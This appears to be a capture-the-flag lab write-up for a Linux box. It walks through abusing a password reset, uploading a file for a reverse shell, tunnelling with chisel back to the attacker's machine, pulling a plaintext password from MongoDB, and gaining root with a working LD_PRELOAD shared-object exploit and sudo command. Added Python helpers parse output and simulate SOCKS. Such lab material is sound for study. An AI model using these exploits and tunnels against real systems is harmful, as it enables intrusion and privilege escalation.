Challenge description
Difficulty: Medium. Description: as usual, get the user and root flags. Prerequisites:
Basic information
| 🚀 | Local machine | Target machine |
|---|---|---|
| IP | 10.17.5.121 | 10.10.177.40 |
| OS | Kali | Linux |
Note that the scan and shell output below shows the target at 10.10.141.52 rather than the address recorded in this table.
Information gathering
Port scan
Open 10.10.141.52:22
Open 10.10.141.52:80
Path enumeration
http://10.10.141.52/v2/index.php
http://10.10.141.52/phpMyAdmin/
CMS identification
└─$ whatweb http://10.10.141.52/phpMyAdmin/
http://10.10.141.52/phpMyAdmin/ [200 OK] Apache[2.4.41], Bootstrap, Content-Security-Policy[default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';,default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';], Cookies[phpMyAdmin,pma_lang], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], HttpOnly[phpMyAdmin,pma_lang], IP[10.10.141.52], JQuery, PasswordField[pma_password], Script[text/javascript], Title[phpMyAdmin], UncommonHeaders[x-ob_mode,referrer-policy,content-security-policy,x-content-security-policy,x-webkit-csp,x-content-type-options,x-permitted-cross-domain-policies,x-robots-tag], X-Frame-Options[DENY], X-UA-Compatible[IE=Edge], X-XSS-Protection[1; mode=block], phpMyAdmin[5.1.0]
Vulnerability discovery
WordPress Plugin Portable phpMyAdmin - Authentication Bypass | php/webapps/23356.txt
This is the only searchsploit hit for "phpMyAdmin", and it targets the WordPress "Portable phpMyAdmin" plugin, not a standalone phpMyAdmin 5.1.0 install, so it does not apply here. The useful findings are in the web application itself: a file-upload function and a password-reset function.

File upload function

There is a function to reset a user's password.
Can the password of admin@sky.thm be changed?
Yes, it can.
Exploitation
Use the admin account to upload a file and get a reverse shell.
Arbitrary file upload
Listening on 0.0.0.0 1234
Connection received on 10.10.141.52 35518
Linux sky 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
12:56:49 up 41 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Web shell
Obtained, so the shell can now be stabilized and persisted.
User shell
www-data@sky:/$ ss -tnlu
ss -tnlu
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 10.10.141.52%eth0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:9000 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:27017 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
Reverse SOCKS tunnel
Start the chisel server on Kali
chisel server -p 8888 --reverse
2024/11/16 21:28:51 server: Reverse tunnelling enabled
2024/11/16 21:28:51 server: Fingerprint CPyZ11V0OUg5OOq3hTjFuiTChTaWgj0fUQFRwWyvdTU=
2024/11/16 21:28:51 server: Listening on http://0.0.0.0:8888
2024/11/16 21:30:07 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1)
2024/11/16 21:30:07 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Start the chisel client on the target
www-data@sky:/tmp$ ./chisel client 10.17.5.121:8888 R:socks
Overall flow
Kali runs the chisel server, the target connects back to it, and the server opens a SOCKS proxy on 127.0.0.1:1080 whose connections are forwarded over the tunnel and made from the target.
Point proxychains at 127.0.0.1:1080 and use it to reach the target's loopback-only services (3306, 9000, 27017, 33060 from the ss output above).
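To make the pivot concrete, here is the SOCKS5 CONNECT exchange (RFC 1928) that proxychains performs against the chisel listener on 127.0.0.1:1080 for every TCP connection it relays. This is an added example, not code from this writeup or from chisel: the client half is what proxychains sends, the server half is a constructed stand-in that answers like a SOCKS5 server and reports success only for (host, port) pairs listed in `open_ports`, and the two halves talk over a local socketpair so the whole thing runs offline. It also shows why only connect()-based tools go through the proxy: the relay exists only for this handshake, a raw-packet scan never produces one.

```python
"""SOCKS5 CONNECT exchange: client side as proxychains does it, plus a
constructed server side standing in for the chisel SOCKS listener."""
import socket
import struct
import threading

SOCKS_VER = 0x05
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
REP_SUCCEEDED = 0x00
REP_CONN_REFUSED = 0x05


def build_connect_request(host: str, port: int) -> bytes:
    """Client -> proxy: VER CMD RSV ATYP DST.ADDR DST.PORT."""
    return (struct.pack("!BBBB", SOCKS_VER, CMD_CONNECT, 0x00, ATYP_IPV4)
            + socket.inet_aton(host) + struct.pack("!H", port))


def parse_reply(data: bytes):
    """Proxy -> client: VER REP RSV ATYP BND.ADDR BND.PORT; returns (rep, host, port)."""
    ver, rep, _rsv, atyp = struct.unpack("!BBBB", data[:4])
    if ver != SOCKS_VER or atyp != ATYP_IPV4:
        raise ValueError("unexpected SOCKS5 reply")
    (port,) = struct.unpack("!H", data[8:10])
    return rep, socket.inet_ntoa(data[4:8]), port


def socks5_connect(sock, host: str, port: int):
    """Client half: method negotiation, then CONNECT. Returns the parsed reply."""
    sock.sendall(bytes([SOCKS_VER, 0x01, NO_AUTH]))   # offer one method: no auth
    ver, method = sock.recv(2)
    if ver != SOCKS_VER or method != NO_AUTH:
        raise ConnectionError("proxy did not accept no-auth")
    sock.sendall(build_connect_request(host, port))
    return parse_reply(sock.recv(10))


def fake_socks_server(sock, open_ports):
    """Constructed server half (stand-in for chisel): accept no-auth, then
    report success only if the requested (host, port) is in open_ports,
    the way a real proxy would after trying connect() on the far side."""
    ver, nmethods = sock.recv(2)
    sock.recv(nmethods)                                  # the offered methods
    sock.sendall(bytes([SOCKS_VER, NO_AUTH]))
    req = sock.recv(10)
    _ver, cmd, _rsv, _atyp = req[:4]
    host = socket.inet_ntoa(req[4:8])
    (port,) = struct.unpack("!H", req[8:10])
    ok = cmd == CMD_CONNECT and (host, port) in open_ports
    rep = REP_SUCCEEDED if ok else REP_CONN_REFUSED
    # BND.ADDR/BND.PORT: where the proxy bound on the target side (constructed values)
    sock.sendall(struct.pack("!BBBB", SOCKS_VER, rep, 0x00, ATYP_IPV4)
                 + socket.inet_aton("127.0.0.1") + struct.pack("!H", 40000))
    sock.close()


def probe_through_socks(host: str, port: int, open_ports) -> bool:
    """One CONNECT through the fake proxy; True when the target port is open."""
    client, server = socket.socketpair()
    t = threading.Thread(target=fake_socks_server, args=(server, open_ports))
    t.start()
    try:
        rep, _bnd_host, _bnd_port = socks5_connect(client, host, port)
    finally:
        client.close()
        t.join()
    return rep == REP_SUCCEEDED


if __name__ == "__main__":
    # constructed view of the target's loopback listeners, taken from the ss output
    listening = {("127.0.0.1", 27017), ("127.0.0.1", 3306), ("127.0.0.1", 9000)}
    for p in (27017, 3306, 8080):
        state = "open" if probe_through_socks("127.0.0.1", p, listening) else "closed"
        print(f"127.0.0.1:{p} -> {state}")
```

A real chisel listener would perform the connect() on the target and answer with the same reply codes; swap `fake_socks_server` for a socket to 127.0.0.1:1080 and `socks5_connect` works unchanged.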
root@HACK ~# proxychains rustscan -a 127.0.0.1 -p 27017
ProxyChains-3.1 (http://proxychains.sf.net)
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
|S-chain|-<>-127.0.0.1:1080-<><>-127.0.0.1:27017-<><>-OK
Open 127.0.0.1:27017
[~] Starting Script(s)
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-16 21:50 HKT
Initiating SYN Stealth Scan at 21:50
Scanning localhost (127.0.0.1) [1 port]
Completed SYN Stealth Scan at 21:50, 0.02s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up, received localhost-response (0.000065s latency).
Scanned at 2024-11-16 21:50:45 HKT for 0s
PORT STATE SERVICE REASON
27017/tcp closed mongod reset ttl 64
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
Raw packets sent: 1 (44B) | Rcvd: 2 (84B)
Note on the contradictory result: the |S-chain| line shows proxychains relaying rustscan's connect() to 127.0.0.1:27017 on the target, which is why rustscan reports the port Open. The nmap SYN scan that rustscan launches afterwards uses raw sockets, which proxychains cannot hook, so that scan went to Kali's own loopback and reports 27017/tcp closed. Only tools that make ordinary connect() calls (nmap -sT, the mongo client, curl and so on) actually traverse the SOCKS proxy.
$ mongo --port 27017
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("65039ed9-60ef-4a2c-a5d3-9271c3de8923") }
MongoDB server version: 4.4.6
show databases;
admin 0.000GB
backup 0.000GB
config 0.000GB
local 0.000GB
use backup;
switched to db backup
show tables;
collection
user
select * from user;
uncaught exception: SyntaxError: unexpected token: identifier :
@(shell):1:14
show collections
collection
user
db.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
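The interesting row above is the one holding a Name/Pass pair in an otherwise unrelated collection. Pulling such pairs out of a larger dump by eye does not scale, so here is a small parser for mongo shell `find()` output that turns each line into a dict and reports documents carrying a password-like field. This is an added example, not part of the writeup; the sample input is the five rows printed above, and the set of field names treated as credentials is my own heuristic. It goes slightly beyond the page by also unwrapping the other shell-only wrappers (`ISODate(...)`, `NumberLong(...)`) that make this output non-JSON.

```python
import json
import re

# Sample rows, copied from the mongo shell output in this writeup
# (database "backup", collection "user").
SAMPLE_DUMP = """\
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }
"""

# mongo shell prints BSON types as Name(value); the inner value is valid JSON
_WRAPPER = re.compile(r"\b(?:ObjectId|ISODate|NumberLong|NumberInt|NumberDecimal)\(([^)]*)\)")

# Heuristic field names (my assumption, not anything MongoDB defines)
CRED_KEYS = {"pass", "password", "passwd", "pwd", "secret", "token", "hash"}
USER_KEYS = {"name", "user", "username", "login", "email"}


def parse_shell_docs(text):
    """Turn mongo shell find() output into a list of dicts."""
    docs = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("{"):
            continue                      # prompts, "Type it to see more", etc.
        docs.append(json.loads(_WRAPPER.sub(r"\1", line)))
    return docs


def find_credentials(docs):
    """Return (user, secret, field) triples for docs that hold a password-like field."""
    hits = []
    for doc in docs:
        lower = {k.lower(): k for k in doc}          # case-insensitive field lookup
        secret_fields = [lower[k] for k in lower if k in CRED_KEYS]
        if not secret_fields:
            continue
        user_field = next((lower[k] for k in lower if k in USER_KEYS), None)
        for field in secret_fields:
            hits.append((doc.get(user_field), doc[field], field))
    return hits


if __name__ == "__main__":
    for user, secret, field in find_credentials(parse_shell_docs(SAMPLE_DUMP)):
        print(f"{user}:{secret}  (from field {field})")
```

Feed it the saved output of `db.<collection>.find()` for every collection in every database; the credential found here is what gives the webdeveloper login used next.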
webdeveloper@sky:/$ whoami
whoami
webdeveloper
webdeveloper@sky:/$ sudo -l
sudo -l
Matching Defaults entries for webdeveloper on sky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD
User webdeveloper may run the following commands on sky:
(ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
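The decisive detail in this output is not the NOPASSWD rule by itself but its combination with `env_keep+=LD_PRELOAD`: sudo will pass a loader variable we control into a process that runs as root. Below is an added example (not from the writeup or any tool it uses) that parses `sudo -l` output and flags exactly that combination, also treating `LD_LIBRARY_PATH`, `LD_AUDIT` and the `SETENV` rule tag as equivalent, since any of them lets the caller choose code the loader runs. The sample input is the `sudo -l` output shown above; the tag list and the set of loader variables are my own.

```python
import re

# `sudo -l` output as printed earlier in this writeup, used as sample input.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin,
    env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility
"""

# Variables honoured by the dynamic loader; preserving any of them across sudo
# lets the caller load code into the root process (my list, not sudo's).
LOADER_VARS = {"LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT"}
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|LOG_INPUT|NOLOG_INPUT|"
                    r"LOG_OUTPUT|NOLOG_OUTPUT|MAIL|NOMAIL|FOLLOW|NOFOLLOW):\s*")


def parse_sudo_l(text):
    """Split `sudo -l` output into a list of Defaults entries and a list of rules."""
    defaults, rules, section = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Matching Defaults entries"):
            section = "defaults"
            continue
        if line.startswith("User ") and "may run" in line:
            section = "rules"
            continue
        if section == "defaults":
            defaults.extend(p.strip() for p in line.split(",") if p.strip())
        elif section == "rules":
            m = RULE_RE.match(line)
            if not m:
                continue
            rest, tags = m.group("rest"), []
            while True:                      # peel off leading "TAG:" markers
                t = TAG_RE.match(rest)
                if not t:
                    break
                tags.append(t.group(1))
                rest = rest[t.end():]
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": rest.strip()})
    return defaults, rules


def kept_env_vars(defaults):
    """Environment variables preserved by env_keep / env_keep+= entries."""
    kept = set()
    for d in defaults:
        if d.startswith("env_keep"):
            _, _, value = d.partition("=")
            kept.update(value.strip('"').split())
    return kept


def find_preload_escalations(text):
    """Rules where the caller can inject a loader variable into the run-as process."""
    defaults, rules = parse_sudo_l(text)
    kept_loader = kept_env_vars(defaults) & LOADER_VARS
    findings = []
    for r in rules:
        if kept_loader or "SETENV" in r["tags"]:
            findings.append({"cmd": r["cmd"], "runas": r["runas"],
                             "nopasswd": "NOPASSWD" in r["tags"],
                             "via": sorted(kept_loader) or ["SETENV"]})
    return findings


if __name__ == "__main__":
    for f in find_preload_escalations(SAMPLE_SUDO_L):
        print(f"{f['cmd']} as ({f['runas']}) via {','.join(f['via'])}"
              f"{' without a password' if f['nopasswd'] else ''}")
```

The remaining check is done by hand: `file` must show the command is dynamically linked, otherwise the loader never reads LD_PRELOAD.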
Root shell
https://whitecr0wz.github.io/posts/LD_PRELOAD/
webdeveloper@sky:~$ file /usr/bin/sky_backup_utility
file /usr/bin/sky_backup_utility
/usr/bin/sky_backup_utility: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e1edd422e86d9c4cdb136d11a2dfbda966aa326d, for GNU/Linux 3.2.0, not stripped
webdeveloper@sky:~$ strings /usr/bin/sky_backup_utility
strings /usr/bin/sky_backup_utility
/lib64/ld-linux-x86-64.so.2
puts
printf
system
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Sky Backup Utility
Now attempting to backup Sky
tar -czvf /root/.backup/sky-backup.tar.gz /var/www/html/*
Backup failed!
Check your permissions!
Backup successful!
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
sky.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
printf@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
The strings that matter: `tar`, `/var/www/html/`, `/root/.backup/`. The binary calls system() to run `tar -czvf /root/.backup/sky-backup.tar.gz /var/www/html/*`. It is dynamically linked against libc, and sudo preserves LD_PRELOAD (env_keep+=LD_PRELOAD in the Defaults above), so a shared object we control is loaded into the root process before main() runs.
```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>     /* setuid, setgid */

/* Built with -nostartfiles, so this _init becomes the library's init
 * routine and runs when the loader maps it, i.e. before
 * sky_backup_utility's main() executes as root. */
void _init(void) {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the child bash */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```
```bash
gcc exploit.c -o /tmp/exploit -fPIC -shared -nostartfiles -w
sudo LD_PRELOAD=/tmp/exploit /usr/bin/sky_backup_utility
```
root@sky:/tmp# whoami;hostname;id;ip a
root
sky
uid=0(root) gid=0(root) groups=0(root)
Key takeaways
- Arbitrary file upload
- Privilege escalation via plaintext credentials stored in the MongoDB backup database
- Privilege escalation by abusing an environment variable preserved by sudo (env_keep+=LD_PRELOAD) against a NOPASSWD binary